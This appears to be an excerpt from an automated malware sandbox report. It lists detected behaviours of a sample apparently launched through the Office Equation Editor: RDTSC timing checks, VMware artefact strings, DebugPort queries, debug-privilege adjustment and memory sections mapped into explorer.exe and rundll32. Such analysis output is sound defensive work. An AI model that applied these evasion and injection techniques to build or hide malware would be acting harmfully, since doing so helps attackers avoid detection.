Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\calc.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\calc.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000000D9904 second address: 00000000000D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000000D9B7E second address: 00000000000D9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1200	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2576	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2576	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2432	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2832	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2364	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2612	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.489512563.000000000457A000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0\?P
Source: explorer.exe, 0000000B.00000000.489512563.000000000457A000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 0000000B.00000000.536704123.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 0000000B.00000000.493594520.0000000000255000.00000004.00000020.sdmp	Binary or memory string: `(SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000ALBG
Source: explorer.exe, 0000000B.00000000.540834736.00000000045CF000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A10080 mov ecx, dword ptr fs:[00000030h]	10_2_00A10080
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A100EA mov eax, dword ptr fs:[00000030h]	10_2_00A100EA
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A326F8 mov eax, dword ptr fs:[00000030h]	10_2_00A326F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025626F8 mov eax, dword ptr fs:[00000030h]	12_2_025626F8

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\calc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\calc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior